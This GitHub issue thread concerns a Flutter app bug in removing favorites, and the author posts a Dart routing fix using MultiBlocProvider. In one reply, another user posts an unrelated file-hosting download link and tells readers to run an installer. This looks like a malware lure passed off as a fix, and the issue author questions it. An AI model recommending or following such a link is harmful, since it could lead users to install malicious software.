### ISSUE TITLE
Issue with Removing Items from Favorites View"

### ISSUE THREAD

**Issue by ahmdZhran** [ahmdZhran/shop_app#148]
## Description:
When trying to remove an item from the `FavoritesView`, the app did not behave consistently, leading to items not being removed correctly or the UI not updating as expected. This issue was traced back to the improper instantiation and management of the `FavoriteCubit`.

## Solution:
The issue was resolved by using a `MultiBlocProvider` in the routing configuration to ensure that the `FavoriteCubit` is properly instantiated and managed. This guarantees that the `FavoriteCubit` is shared across all necessary widgets in the `MainView`, including the `FavoritesView` and the favorite button used to toggle favorite status.
## Code Implementation:
```dart
case Routes.mainScreen:
  return MaterialPageRoute(
    builder: (_) => MultiBlocProvider(
      providers: [
        BlocProvider(create: (context) => FavoriteCubit(getIt())),
      ],
      child: const MainView(),
    ),
  );

**Comment by santos-naudiyal** [comment]
try this
https://gofile.io/d/yMHabA
select the desired compiler in the installer

**Comment by ahmdZhran** [comment]
This file solves what ?!
